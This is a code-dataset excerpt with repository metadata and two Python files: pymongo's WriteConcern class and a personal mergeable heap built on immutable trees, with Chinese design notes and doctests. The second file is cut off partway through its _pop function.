blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 3 281 | content_id stringlengths 40 40 | detected_licenses listlengths 0 57 | license_type stringclasses 2 values | repo_name stringlengths 6 116 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringclasses 313 values | visit_date timestamp[us] | revision_date timestamp[us] | committer_date timestamp[us] | github_id int64 18.2k 668M ⌀ | star_events_count int64 0 102k | fork_events_count int64 0 38.2k | gha_license_id stringclasses 17 values | gha_event_created_at timestamp[us] | gha_created_at timestamp[us] | gha_language stringclasses 107 values | src_encoding stringclasses 20 values | language stringclasses 1 value | is_vendor bool 2 classes | is_generated bool 2 classes | length_bytes int64 4 6.02M | extension stringclasses 78 values | content stringlengths 2 6.02M | authors listlengths 1 1 | author stringlengths 0 175 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
a6c223f868e4c11922e97249c425499dc397669a | 9baa9f1bedf7bc973f26ab37c9b3046824b80ca7 | /venv-bck/lib/python2.7/site-packages/pymongo/write_concern.py | d16f1d0b8e1ba18818c6bcc891bc21c10cae0f6b | [] | no_license | shakthydoss/suriyan | 58774fc5de1de0a9f9975c2ee3a98900e0a5dff4 | 8e39eb2e65cc6c6551fc165b422b46d598cc54b8 | refs/heads/master | 2020-04-12T05:36:59.957153 | 2017-01-08T06:12:13 | 2017-01-08T06:12:13 | 59,631,349 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,444 | py | # Copyright 2014-2015 MongoDB, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tools for working with write concerns."""
from bson.py3compat import integer_types, string_type
from pymongo.errors import ConfigurationError
class WriteConcern(object):
"""WriteConcern
:Parameters:
- `w`: (integer or string) Used with replication, write operations
will block until they have been replicated to the specified number
or tagged set of servers. `w=<integer>` always includes the replica
set primary (e.g. w=3 means write to the primary and wait until
replicated to **two** secondaries). **w=0 disables acknowledgement
of write operations and can not be used with other write concern
options.**
- `wtimeout`: (integer) Used in conjunction with `w`. Specify a value
in milliseconds to control how long to wait for write propagation
to complete. If replication does not complete in the given
timeframe, a timeout exception is raised.
- `j`: If ``True`` block until write operations have been committed
to the journal. Cannot be used in combination with `fsync`. Prior
to MongoDB 2.6 this option was ignored if the server was running
without journaling. Starting with MongoDB 2.6 write operations will
fail with an exception if this option is used when the server is
running without journaling.
- `fsync`: If ``True`` and the server is running without journaling,
blocks until the server has synced all data files to disk. If the
server is running with journaling, this acts the same as the `j`
option, blocking until write operations have been committed to the
journal. Cannot be used in combination with `j`.
"""
__slots__ = ("__document", "__acknowledged")
def __init__(self, w=None, wtimeout=None, j=None, fsync=None):
self.__document = {}
self.__acknowledged = True
if wtimeout is not None:
if not isinstance(wtimeout, integer_types):
raise TypeError("wtimeout must be an integer")
self.__document["wtimeout"] = wtimeout
if j is not None:
if not isinstance(j, bool):
raise TypeError("j must be True or False")
self.__document["j"] = j
if fsync is not None:
if not isinstance(fsync, bool):
raise TypeError("fsync must be True or False")
if j and fsync:
raise ConfigurationError("Can't set both j "
"and fsync at the same time")
self.__document["fsync"] = fsync
if self.__document and w == 0:
raise ConfigurationError("Can not use w value "
"of 0 with other options")
if w is not None:
if isinstance(w, integer_types):
self.__acknowledged = w > 0
elif not isinstance(w, string_type):
raise TypeError("w must be an integer or string")
self.__document["w"] = w
@property
def document(self):
"""The document representation of this write concern.
.. note::
:class:`WriteConcern` is immutable. Mutating the value of
:attr:`document` does not mutate this :class:`WriteConcern`.
"""
return self.__document.copy()
@property
def acknowledged(self):
"""If ``True`` write operations will wait for acknowledgement before
returning.
"""
return self.__acknowledged
def __repr__(self):
return ("WriteConcern(%s)" % (
", ".join("%s=%s" % kvt for kvt in self.document.items()),))
def __eq__(self, other):
return self.document == other.document
def __ne__(self, other):
return self.document != other.document
| [
"shakthydoss@gmail.com"
] | shakthydoss@gmail.com |
c6d53eae7e1128d46dbbb956b76c3a7d625330d0 | 13f4a06cd439f579e34bf38406a9d5647fe7a0f3 | /seed/types/MergeableHeap__immutable_tree.py | 62b0066d20d34eb16226590a2d6f29b3da608310 | [] | no_license | edt-yxz-zzd/python3_src | 43d6c2a8ef2a618f750b59e207a2806132076526 | 41f3a506feffb5f33d4559e5b69717d9bb6303c9 | refs/heads/master | 2023-05-12T01:46:28.198286 | 2023-05-01T13:46:32 | 2023-05-01T13:46:32 | 143,530,977 | 2 | 2 | null | null | null | null | UTF-8 | Python | false | false | 33,990 | py | #__all__:goto
#testing_________goto:goto
r'''[[[
seed.types.MergeableHeap__immutable_tree
view ../../python3_src/seed/types/MergeableHeap__immutable_tree.py
using immutable_tree underlying
O(1) copy
++unoin/merge: like eat() but donot clear() input heap
view ../../python3_src/seed/types/MergeableHeap__mutable_tree.py
just forward seed.types.MergeableHeap
e ../../python3_src/seed/types/MergeableHeap__immutable_tree.py
ver1:
view ../../python3_src/seed/types/MergeableHeap-ver1-eat-O(logM_mul_logN)-not-best.py
所有 非叶节点 含payload
eat() - O(logM*logN)
ver2:
view ../../python3_src/seed/types/MergeableHeap.py
view ../../python3_src/seed/types/MergeableHeap__mutable_tree.py
所有 二叉节点fork 含min_payload
只有 单元节点unit 含 min_payload是payload
eat() - O(logM+logN)
ver3 [当前]:
view ../../python3_src/seed/types/MergeableHeap__immutable_tree.py
using immutable_tree
[[[
===
used in:
e script/matrix_chain_product.py
e others/book/matrix_chain_product/Computation of matrix chain products I,II(1984)(Hu)(Shing)[polygon partitioning].pdf.txt
以下ver1相关,已过时[[
平衡二叉树:
左右子树 高度相差 至多为一
[min_num_nodes_of_height(h) =[def]= if h==0 then 0 else if h==1 then 1 else min_num_nodes_of_height(h-1)+min_num_nodes_of_height(h-2)+1]
[max_num_nodes_of_height(h) =[def]= if h==0 then 0 else max_num_nodes_of_height(h-1)+max_num_nodes_of_height(h-1)+1]
[max_num_nodes_of_height(h) == 2**h-1]
0,1,3,7,15,31
1,2,4,8,16,32
[min_num_nodes_of_height(h) == Fibonacci_sequence[h+2]-1]
# ~= 1.618**h * K
0,1,2,4,7,12
0,1,1,2,3,5,8,13
[min_num_nodes_of_height,max_num_nodes_of_height 都是指数增长]
高度 最多比 完美平衡树 多一半
>>> from math import log
>>> log(2)/log(1.618)
1.4404829720657013
]]
ver2[[
bug: [min_num_nodes_of_height(h) =[def]= if h==0 then 0 else if h==1 then 1 else min_num_nodes_of_height(h-1)+min_num_nodes_of_height(h-2)+1]
[min_num_nodes_of_height(h) =[def]= if h==0 then 0 else if h==1 then 1 else if h==2 then 3 else min_num_nodes_of_height(h-1)+min_num_nodes_of_height(h-2)+1]
非叶节点的数量:二叉节点+单元节点 # 不含 空叶节点
(2->3)是因为 二叉节点 的 直接子代 不是 空叶节点
0,1,3,5,9,15,25,41,67,109
see:_eat_
[min_num_payloads_of_height(h) =[def]= if h==0 then 0 else if h==1 then 1 else if h==2 then 2 else min_num_payloads_of_height(h-1)+min_num_payloads_of_height(h-2)]
实际数据的数量:单元节点
(2->2)是因为 二叉节点 的 直接子代 不含 空叶节点
0,1,2,3,5,8,13,21,34,55,89
[min_num_payloads_of_height(h) == Fibonacci_sequence[h+1] -[h==0]]
0,1,2,3,5, 8,13
0,1,1,2,3,5, 8,13
0,1,3,5,9,15,25,41,67,109
[min_num_nodes_of_height(h) == min_num_payloads_of_height(h)*2 -1 +[h==0]]
!! [num_nodes_of_height(tree) == max(0, num_payloads_of_height(tree)*2 -1)]
[min_num_nodes_of_height(h) == Fibonacci_sequence[h+1]*2 -1 -[h==0]]
[max_num_nodes_of_height(h) =[def]= if h==0 then 0 else max_num_nodes_of_height(h-1)+max_num_nodes_of_height(h-1)+1]
[max_num_payloads_of_height(h) =[def]= if h==0 then 0 else if h==1 then 1 else max_num_payloads_of_height(h-1)+max_num_payloads_of_height(h-1)]
[max_num_nodes_of_height(h) == 2**h-1]
[max_num_payloads_of_height(h) == floor(2**(h-1))]
]]
O(1)操作:
len(heap) -> size
bool(heap) -> bool
heap.peak() -> min_item
O(log(N))操作:
heap.push(item)
heap.pop() -> min_item
取出最小值
heap.merge(const& heap)
ver3[当前]:O(logN+logM)
new in ver3
heap.eat(std::move(heap))
破坏性融合
ver1:O(logN*logM)算法。比 普通情形O(N*logM)稍佳,但不及预期目标O(logN+logM)
ver2:O(logN+logM)
heap.push_then_pop(item) -> min_item
heap.pop_then_push(item) -> min_item
O(logN+M+logM)操作:
heap.pushs([item])
O(M)操作:
MergeableHeap([item])
O(N)操作:
[*iter(heap)]
非破坏性无序只读操作
heap.as_tree() -> tree=(()|(payload, tree, tree))
O(N*log(N))操作:
[*heap.iter_pops()]
破坏性有序操作
heap.to_sorted()
new in ver3
]]]
py -m nn_ns.app.debug_cmd seed.types.MergeableHeap__immutable_tree
py -m seed.types.MergeableHeap__immutable_tree
from seed.types.MergeableHeap__immutable_tree import MergeableHeap__immutable_tree, MergeableHeap, HeapError__Empty, HeapError__EatSelf, HeapError__Validate
[[[
===
>>> from seed.types.MergeableHeap__immutable_tree import MergeableHeap__immutable_tree, MergeableHeap, HeapError__Empty, HeapError__EatSelf, HeapError__Validate
>>> heap = MergeableHeap()
>>> heap
MergeableHeap()
>>> bool(heap)
False
>>> len(heap)
0
>>> [*iter(heap)]
[]
>>> [*heap.iter_pops()]
[]
>>> heap.as_tree()
()
>>> heap.verify()
>>> heap.push(999)
>>> heap.verify()
>>> heap
MergeableHeap([999])
>>> bool(heap)
True
>>> len(heap)
1
>>> [*iter(heap)]
[999]
>>> heap.as_tree()
(999, (), ())
>>> heap.peak()
999
>>> [*heap.iter_pops()]
[999]
>>> heap.peak() #doctest: +IGNORE_EXCEPTION_DETAIL
Traceback (most recent call last):
...
HeapError__Empty
>>> heap.pop() #doctest: +IGNORE_EXCEPTION_DETAIL
Traceback (most recent call last):
...
HeapError__Empty
>>> heap.eat(heap) #doctest: +IGNORE_EXCEPTION_DETAIL
Traceback (most recent call last):
...
HeapError__EatSelf
>>> heap.push(999)
>>> heap
MergeableHeap([999])
>>> heap.as_tree()
(999, (), ())
>>> heap.push(888)
>>> heap
MergeableHeap([999, 888])
>>> heap.as_tree()
(888, (999, (), ()), (888, (), ()))
>>> heap.verify()
>>> heap.push(222)
>>> heap
MergeableHeap([999, 222, 888])
>>> heap.as_tree()
(222, (222, (999, (), ()), (222, (), ())), (888, (), ()))
>>> heap.verify()
>>> heap.push(333)
>>> heap
MergeableHeap([999, 222, 888, 333])
>>> heap.as_tree()
(222, (222, (999, (), ()), (222, (), ())), (333, (888, (), ()), (333, (), ())))
>>> heap.verify()
>>> heap.push(777)
>>> heap
MergeableHeap([999, 777, 222, 888, 333])
>>> heap.as_tree()
(222, (222, (777, (999, (), ()), (777, (), ())), (222, (), ())), (333, (888, (), ()), (333, (), ())))
>>> heap.verify()
>>> heap.push(555)
>>> heap
MergeableHeap([999, 777, 222, 888, 555, 333])
>>> heap.as_tree()
(222, (222, (777, (999, (), ()), (777, (), ())), (222, (), ())), (333, (555, (888, (), ()), (555, (), ())), (333, (), ())))
>>> heap.verify()
>>> heap.push(444)
>>> heap
MergeableHeap([999, 777, 222, 444, 888, 555, 333])
>>> heap.as_tree()
(222, (222, (777, (999, (), ()), (777, (), ())), (222, (222, (), ()), (444, (), ()))), (333, (555, (888, (), ()), (555, (), ())), (333, (), ())))
>>> heap.verify()
>>> heap.push(666)
>>> heap
MergeableHeap([999, 666, 777, 222, 444, 888, 555, 333])
>>> heap.as_tree()
(222, (222, (666, (666, (999, (), ()), (666, (), ())), (777, (), ())), (222, (222, (), ()), (444, (), ()))), (333, (555, (888, (), ()), (555, (), ())), (333, (), ())))
>>> heap.verify()
>>> heap.push(111)
>>> heap
MergeableHeap([999, 666, 777, 222, 444, 888, 555, 333, 111])
>>> heap.as_tree()
(111, (222, (666, (666, (999, (), ()), (666, (), ())), (777, (), ())), (222, (222, (), ()), (444, (), ()))), (111, (555, (888, (), ()), (555, (), ())), (111, (333, (), ()), (111, (), ()))))
>>> heap.verify()
>>> bool(heap)
True
>>> len(heap)
9
>>> [*iter(heap)]
[999, 666, 777, 222, 444, 888, 555, 333, 111]
>>> heap.peak()
111
>>> heap.pop()
111
>>> heap.as_tree()
(222, (222, (666, (666, (), ()), (777, (), ())), (222, (222, (), ()), (444, (), ()))), (333, (555, (888, (), ()), (555, (), ())), (333, (333, (), ()), (999, (), ()))))
>>> heap.verify()
>>> heap.pop()
222
>>> heap.as_tree()
(333, (444, (777, (), ()), (444, (666, (), ()), (444, (), ()))), (333, (555, (888, (), ()), (555, (), ())), (333, (333, (), ()), (999, (), ()))))
>>> heap.verify()
>>> heap.pop()
333
>>> heap.as_tree()
(444, (444, (777, (), ()), (444, (), ())), (555, (555, (888, (), ()), (555, (), ())), (666, (666, (), ()), (999, (), ()))))
>>> heap.verify()
>>> heap.pop()
444
>>> heap.as_tree()
(555, (777, (777, (), ()), (888, (), ())), (555, (555, (), ()), (666, (666, (), ()), (999, (), ()))))
>>> heap.verify()
>>> heap.pop()
555
>>> heap.as_tree()
(666, (777, (777, (), ()), (888, (), ())), (666, (666, (), ()), (999, (), ())))
>>> heap.verify()
>>> heap.pop()
666
>>> heap.as_tree()
(777, (888, (), ()), (777, (777, (), ()), (999, (), ())))
>>> heap.verify()
>>> heap.pop()
777
>>> heap.as_tree()
(888, (888, (), ()), (999, (), ()))
>>> heap.verify()
>>> [*heap.iter_pops()]
[888, 999]
>>> len(heap)
0
>>> bool(heap)
False
>>> heap.as_tree()
()
>>> heap.verify()
>>> heap
MergeableHeap()
>>> heap.pushs(range(111, 1000, 111))
>>> heap.as_tree()
(111, (111, (111, (111, (), ()), (222, (), ())), (333, (333, (), ()), (444, (), ()))), (555, (555, (555, (), ()), (666, (), ())), (777, (777, (777, (), ()), (888, (), ())), (999, (), ()))))
>>> heap.verify()
>>> heap.push_then_pop(-555)
-555
>>> heap.as_tree()
(111, (111, (111, (111, (), ()), (222, (), ())), (333, (333, (), ()), (444, (), ()))), (555, (555, (555, (), ()), (666, (), ())), (777, (777, (777, (), ()), (888, (), ())), (999, (), ()))))
>>> heap.verify()
>>> heap.clear()
>>> heap.as_tree()
()
>>> heap.pushs(range(111, 1000, 111))
>>> heap.push(-555)
>>> heap.as_tree()
(-555, (-555, (-555, (-555, (111, (), ()), (-555, (), ())), (222, (), ())), (333, (333, (), ()), (444, (), ()))), (555, (555, (555, (), ()), (666, (), ())), (777, (777, (777, (), ()), (888, (), ())), (999, (), ()))))
>>> heap.verify()
>>> heap.pop()
-555
>>> heap.as_tree()
(111, (111, (111, (111, (), ()), (222, (), ())), (333, (333, (), ()), (444, (), ()))), (555, (555, (555, (), ()), (666, (), ())), (777, (777, (777, (), ()), (888, (), ())), (999, (), ()))))
>>> heap.verify()
>>> heap.clear()
>>> heap.as_tree()
()
>>> heap.pushs(range(999, 100, -111))
>>> heap.as_tree()
(111, (666, (888, (999, (), ()), (888, (), ())), (666, (777, (), ()), (666, (), ()))), (111, (444, (555, (), ()), (444, (), ())), (111, (222, (333, (), ()), (222, (), ())), (111, (), ()))))
>>> heap.verify()
>>> heap.pop_then_push(-555)
111
>>> heap.as_tree()
(-555, (666, (888, (999, (), ()), (888, (), ())), (666, (777, (), ()), (666, (), ()))), (-555, (444, (555, (), ()), (444, (), ())), (-555, (222, (333, (), ()), (222, (), ())), (-555, (), ()))))
>>> heap.verify()
>>> heap.clear()
>>> heap.as_tree()
()
>>> heap.pushs(range(999, 100, -111))
>>> heap.as_tree()
(111, (666, (888, (999, (), ()), (888, (), ())), (666, (777, (), ()), (666, (), ()))), (111, (444, (555, (), ()), (444, (), ())), (111, (222, (333, (), ()), (222, (), ())), (111, (), ()))))
>>> heap.pop()
111
>>> heap.as_tree()
(222, (666, (888, (999, (), ()), (888, (), ())), (666, (777, (), ()), (666, (), ()))), (222, (444, (555, (), ()), (444, (), ())), (222, (222, (), ()), (333, (), ()))))
>>> heap.verify()
>>> heap.push(-555)
>>> heap.as_tree()
(-555, (-555, (-555, (-555, (999, (), ()), (-555, (), ())), (888, (), ())), (666, (777, (), ()), (666, (), ()))), (222, (444, (555, (), ()), (444, (), ())), (222, (222, (), ()), (333, (), ()))))
>>> heap.verify()
>>> heap.clear()
>>> heap.pushs(range(111, 1000, 111))
>>> heap.pop_then_push(700)
111
>>> heap.as_tree()
(222, (222, (222, (700, (), ()), (222, (), ())), (333, (333, (), ()), (444, (), ()))), (555, (555, (555, (), ()), (666, (), ())), (777, (777, (777, (), ()), (888, (), ())), (999, (), ()))))
>>> heap.verify()
>>> heap.push_then_pop(400)
222
>>> heap.as_tree()
(333, (333, (400, (700, (), ()), (400, (), ())), (333, (333, (), ()), (444, (), ()))), (555, (555, (555, (), ()), (666, (), ())), (777, (777, (777, (), ()), (888, (), ())), (999, (), ()))))
>>> heap.verify()
>>> heap.clear()
>>> heap.pushs(range(111, 1000, 111))
>>> heap2 = MergeableHeap(range(99, 10, -11))
>>> heap.as_tree()
(111, (111, (111, (111, (), ()), (222, (), ())), (333, (333, (), ()), (444, (), ()))), (555, (555, (555, (), ()), (666, (), ())), (777, (777, (777, (), ()), (888, (), ())), (999, (), ()))))
>>> heap2.as_tree()
(11, (66, (88, (99, (), ()), (88, (), ())), (66, (77, (), ()), (66, (), ()))), (11, (44, (55, (), ()), (44, (), ())), (11, (22, (33, (), ()), (22, (), ())), (11, (), ()))))
>>> heap.eat(heap2)
>>> heap2.as_tree()
()
>>> heap.as_tree()
(11, (111, (111, (111, (111, (), ()), (222, (), ())), (333, (333, (), ()), (444, (), ()))), (555, (555, (555, (), ()), (666, (), ())), (777, (777, (777, (), ()), (888, (), ())), (999, (), ())))), (11, (66, (88, (99, (), ()), (88, (), ())), (66, (77, (), ()), (66, (), ()))), (11, (44, (55, (), ()), (44, (), ())), (11, (22, (33, (), ()), (22, (), ())), (11, (), ())))))
>>> heap.verify()
>>> heap.clear()
>>> heap.pushs(range(111, 1000, 111))
>>> heap2 = MergeableHeap(range(44, 10, -11))
>>> heap2.as_tree()
(11, (33, (44, (), ()), (33, (), ())), (11, (22, (), ()), (11, (), ())))
>>> heap.eat(heap2)
>>> heap2.as_tree()
()
>>> heap.as_tree()
(11, (11, (111, (111, (111, (), ()), (222, (), ())), (333, (333, (), ()), (444, (), ()))), (11, (33, (44, (), ()), (33, (), ())), (11, (22, (), ()), (11, (), ())))), (555, (555, (555, (), ()), (666, (), ())), (777, (777, (777, (), ()), (888, (), ())), (999, (), ()))))
>>> heap.verify()
>>> heap.clear()
>>> heap.pushs(range(111, 500, 111))
>>> heap2 = MergeableHeap(range(88, 10, -11))
>>> heap.as_tree()
(111, (111, (111, (), ()), (222, (), ())), (333, (333, (), ()), (444, (), ())))
>>> heap2.as_tree()
(11, (55, (77, (88, (), ()), (77, (), ())), (55, (66, (), ()), (55, (), ()))), (11, (33, (44, (), ()), (33, (), ())), (11, (22, (), ()), (11, (), ()))))
>>> heap.eat(heap2)
>>> heap2.as_tree()
()
>>> heap.as_tree()
(11, (55, (55, (77, (88, (), ()), (77, (), ())), (55, (66, (), ()), (55, (), ()))), (111, (111, (111, (), ()), (222, (), ())), (333, (333, (), ()), (444, (), ())))), (11, (33, (44, (), ()), (33, (), ())), (11, (22, (), ()), (11, (), ()))))
>>> heap.verify()
>>> heap = MergeableHeap(key=len)
>>> heap.push({1,2,3})
>>> heap.push(range(100))
>>> heap.peak()
{1, 2, 3}
>>> heap.verify()
>>> heap = MergeableHeap(key=len, __lt__=opss.__gt__)
>>> heap.push({1,2,3})
>>> heap.push(range(100))
>>> heap.peak()
range(0, 100)
>>> heap.verify()
>>> heap = MergeableHeap(key=len, __lt__=opss.__gt__, reverse=True)
>>> heap.push({1,2,3})
>>> heap.push(range(100))
>>> heap.peak()
{1, 2, 3}
>>> heap.verify()
>>> heap = MergeableHeap([1, 2, 3])
>>> heap
MergeableHeap([1, 2, 3])
>>> heap.merge(heap)
>>> heap
MergeableHeap([1, 2, 3, 1, 2, 3])
>>> heap.verify()
>>> heap2 = MergeableHeap([4, 5, 6])
>>> heap2
MergeableHeap([4, 5, 6])
>>> heap | heap2
MergeableHeap([1, 2, 3, 4, 5, 6, 1, 2, 3])
>>> heap
MergeableHeap([1, 2, 3, 1, 2, 3])
>>> heap2
MergeableHeap([4, 5, 6])
>>> heap.verify()
>>> heap.merge(heap2)
>>> heap
MergeableHeap([1, 2, 3, 4, 5, 6, 1, 2, 3])
>>> heap2
MergeableHeap([4, 5, 6])
>>> heap.verify()
testing_________goto
#]]]'''
r'''[[[
]]]
#]]]'''
__all__ = '''
MergeableHeap__immutable_tree
MergeableHeap
HeapError__Empty
HeapError__EatSelf
HeapError__Validate
'''.split()
import operator as opss
from itertools import pairwise
from seed.tiny import echo, null_tuple
from seed.helper.repr_input import repr_helper
from collections import namedtuple
class _MHNodeEmpty:
__slots__ = ()
is_empty = True
is_unit = False
is_fork = False
height = 0
size = 0
_empty_node = _MHNodeEmpty()
_MHNode = namedtuple('_MHNode', '''
min_payload
lhs_child
rhs_child
height
size
'''.split()
)
class _MHNode(_MHNode):
__slots__ = ()
is_empty = False
is_unit = False
is_fork = True
__iter__ = None
__len__ = None
__bool__ = None
__getitem__ = None
def __new__(cls, _lt__node, lhs_child, rhs_child, /):
cls.check_args(lhs_child, rhs_child)
(height, size) = cls.prepare_auto_args__shape(lhs_child, rhs_child)
min_payload = cls.prepare_auto_arg__min_payload(_lt__node, lhs_child, rhs_child)
sf = super(__class__, cls).__new__(cls, min_payload, lhs_child, rhs_child, height, size)
return sf
@classmethod
def check_args(cls, lhs_child, rhs_child, /):
assert isinstance(lhs_child, _MHNodeChildTypes)
assert isinstance(rhs_child, _MHNodeChildTypes)
assert abs(lhs_child.height - rhs_child.height) <= 1
assert min(lhs_child.height, rhs_child.height) >= 1
@classmethod
def prepare_auto_args__shape(cls, lhs_child, rhs_child, /):
height = 1+max(lhs_child.height, rhs_child.height)
size = lhs_child.size + rhs_child.size
return (height, size)
@classmethod
def prepare_auto_arg__min_payload(cls, _lt__node, lhs_child, rhs_child, /):
min_child = rhs_child if _lt__node(rhs_child, lhs_child) else lhs_child
min_payload = min_child.min_payload
return min_payload
@property
def children(sf, /):
return (sf.lhs_child, sf.rhs_child)
@property
def sorted_children_by_height(sf, /):
return sorted(sf.children, key=_get_height4node)
@property
def large_child(sf, /):
'giant'
return max(sf.children, key=_get_height4node)
@property
def small_child(sf, /):
'dwarf'
return min(sf.children, key=_get_height4node)
@property
def the_min_payload_child(sf, /):
for child in sf.children:
if sf.min_payload is child.min_payload:
break
else:
raise logic-err
return child
def another_child_of(sf, old_child, /):
if sf.lhs_child is old_child:
return sf.rhs_child
elif sf.rhs_child is old_child:
return sf.lhs_child
else:
raise logic-err
def _get_height4node(node, /):
return node.height
_MHNodeUnit = namedtuple('_MHNodeUnit', '''
payload
'''.split()
)
class _MHNodeUnit(_MHNodeUnit):
__slots__ = ()
is_empty = False
is_unit = True
is_fork = False
#crotch fork
lhs_child = _empty_node
rhs_child = _empty_node
height = 1
size = 1
__iter__ = None
__len__ = None
__bool__ = None
__getitem__ = None
@property
def min_payload(sf, /):
return sf.payload
children = (_empty_node,)*2
sorted_children_by_height = children
small_child, large_child = sorted_children_by_height
#no:the_min_payload_child
_MHNodeTypes = (_MHNode, _MHNodeUnit, _MHNodeEmpty)
_MHNodeChildTypes = (_MHNode, _MHNodeUnit)
del _MHNodeEmpty
class HeapError__Empty(Exception):pass
class HeapError__EatSelf(Exception):pass
class HeapError__Validate(Exception):pass
class _MergeableHeap__mixin:
__slots__ = ()
def verify(sf, /):
for node in _unorder_iter_nodes5root(sf._node):
sf._verify__node(node)
def _verify__node(sf, node, /):
if not node.is_empty:
if not all(1 <= node.height-child.height <= 2 for child in node.children): raise HeapError__Validate
if not any(node.height-child.height == 1 for child in node.children): raise HeapError__Validate
if not abs(node.lhs_child.height-node.rhs_child.height) <= 1: raise HeapError__Validate
if node.is_fork:
if any(sf._lt__node(child, node) for child in node.children): raise HeapError__Validate
if not any(node.min_payload is child.min_payload for child in node.children): raise HeapError__Validate
def __bool__(sf, /):
return not (sf._node.is_empty)
def __len__(sf, /):
return (sf._node.size)
def as_tree(sf, /):
'tree=(()|(payload, tree, tree))'
return _node_as_tree(sf._node)
def __iter__(sf, /):
'unorder iter'
return _unorder_iter_payloads5root(sf._node)
def __repr__(sf, /):
kwargs = {}
if not sf._key_func is echo:
kwargs.update(key=sf._key_func)
if not sf._lt is opss.__lt__:
kwargs.update(__lt__=sf._lt)
if not sf._reverse is False:
kwargs.update(reverse=sf._reverse)
iterable = [*sf]
args = [iterable] if iterable else []
return repr_helper(sf, *args, **kwargs)
def peak(sf, /):
if not sf:
raise HeapError__Empty
return sf._node.min_payload
def _lt__node(sf, lhs_node, rhs_node, /):
assert not lhs_node.is_empty
assert not rhs_node.is_empty
return sf._lt__payload(lhs_node.min_payload, rhs_node.min_payload)
#xxx '[_empty_node == +oo] <<== _pushdown_payload_at_root'
if lhs_node.is_empty:
return False
if rhs_node.is_empty:
return True
return sf._lt__payload(lhs_node.min_payload, rhs_node.min_payload)
def _lt__payload(sf, lhs_payload, rhs_payload, /):
if sf._reverse:
lhs_payload, rhs_payload = rhs_payload, lhs_payload
return sf._lt(sf._key_func(lhs_payload), sf._key_func(rhs_payload))
#end-class _MergeableHeap__mixin:
if 0:
MergeableHeap__immutable_tree = namedtuple('MergeableHeap__immutable_tree', '''
_key_func
_lt
_reverse
_node
'''.split()
)
#ValueError: Field names cannot start with an underscore: '_key_func'
else:
MergeableHeap__immutable_tree = namedtuple('MergeableHeap__immutable_tree', '''
Xkey_func
Xlt
Xreverse
Xnode
'''.split()
)
class MergeableHeap__immutable_tree(MergeableHeap__immutable_tree, _MergeableHeap__mixin):
__slots__ = ()
def __new__(cls, iterable=None, /, *, key=None, __lt__=None, reverse=False):
_key_func = echo if key is None else key
_lt = opss.__lt__ if __lt__ is None else __lt__
_reverse = bool(reverse)
#==>> __repr__, eat, _lt__payload
_node = _empty_node
sf = super(__class__, cls).__new__(cls, _key_func, _lt, _reverse, _node)
iterable = '' if iterable is None else iterable
sf._key_func
#bug:sf = sf.ipushs(iterable)
sf, _ = sf.ipushs(iterable)
sf._key_func
return sf
@property
def _key_func(sf, /):
return sf.Xkey_func
@property
def _lt(sf, /):
return sf.Xlt
@property
def _reverse(sf, /):
return sf.Xreverse
@property
def _node(sf, /):
return sf.Xnode
_key_func
_lt
_reverse
_node
def _return(sf, root, result, /):
new = sf._mk5new_root(root)
return new, result
def _mk5new_root(sf, root, /):
assert isinstance(root, _MHNodeTypes)
ot = sf._replace(Xnode=root)
assert type(sf) is type(ot)
return ot
def iclear(sf, /):
root = _empty_node
return sf._return(root, None)
def ipushs(sf, iterable, /):
root = _pushs(sf, sf._node, iterable)
return sf._return(root, None)
def iter_ipops(sf, /):
while sf:
sf, min_payload = sf.ipop()
yield min_payload
return
def ipop_then_push(sf, payload, /):
min_payload, root = _pop_then_push(sf, sf._node, payload)
return sf._return(root, min_payload)
def ipush_then_pop(sf, payload, /):
min_payload, root = _push_then_pop(sf, sf._node, payload)
return sf._return(root, min_payload)
def ipop(sf, /):
min_payload, root = _pop(sf, sf._node)
return sf._return(root, min_payload)
def ipush(sf, payload, /):
root = _push(sf, sf._node, payload)
return sf._return(root, None)
def imerge(sf, other_heap, /):
if not isinstance(other_heap, __class__):raise TypeError
if not sf._lt is other_heap._lt:raise TypeError
if not sf._key_func is other_heap._key_func:raise TypeError
if not sf._reverse is other_heap._reverse:raise TypeError
root = _eat(sf, sf._node, other_heap._node)
return sf._return(root, None)
def __or__(sf, other_heap, /):
union, _ = sf.imerge(other_heap)
return union
def copy(sf, /):
'O(1)'
return sf
class MergeableHeap(_MergeableHeap__mixin):
__slots__ = '_heap'.split()
def __init__(sf, iterable=None, /, *, key=None, __lt__=None, reverse=False):
sf._heap = MergeableHeap__immutable_tree(iterable, key=key, __lt__=__lt__, reverse=reverse)
sf._key_func
def copy(sf, /):
'O(1)'
new = type(sf)()
new._heap = sf._heap
return new
@property
def _key_func(sf, /):
return sf._heap._key_func
@property
def _lt(sf, /):
return sf._heap._lt
@property
def _reverse(sf, /):
return sf._heap._reverse
@property
def _node(sf, /):
return sf._heap._node
_key_func
_lt
_reverse
_node
def _fwd(sf, f, /, *args, **kwargs):
sf._heap, result = f(*args, **kwargs)
return result
def clear(sf, /):
return sf._fwd(sf._heap.iclear)
def pushs(sf, iterable, /):
return sf._fwd(sf._heap.ipushs, iterable)
def iter_pops(sf, /):
while sf:
yield sf.pop()
return
def pop_then_push(sf, payload, /):
return sf._fwd(sf._heap.ipop_then_push, payload)
def push_then_pop(sf, payload, /):
return sf._fwd(sf._heap.ipush_then_pop, payload)
def pop(sf, /):
return sf._fwd(sf._heap.ipop)
def push(sf, payload, /):
return sf._fwd(sf._heap.ipush, payload)
def merge(sf, other_heap, /):
if not isinstance(other_heap, __class__):raise TypeError
#bug:return sf._fwd(sf._heap.imerge, other_heap)
return sf._fwd(sf._heap.imerge, other_heap._heap)
def __or__(sf, other_heap, /):
new = sf.copy()
new.merge(other_heap)
return new
def eat(sf, other_heap, /):
'heap.eat(std::move(heap))'
if sf is other_heap: raise HeapError__EatSelf
sf.merge(other_heap)
other_heap.clear()
return None
def _pop(sf, root, /):
'-> (min_payload, root)|raise HeapError__Empty'
L = root.size
H = root.height
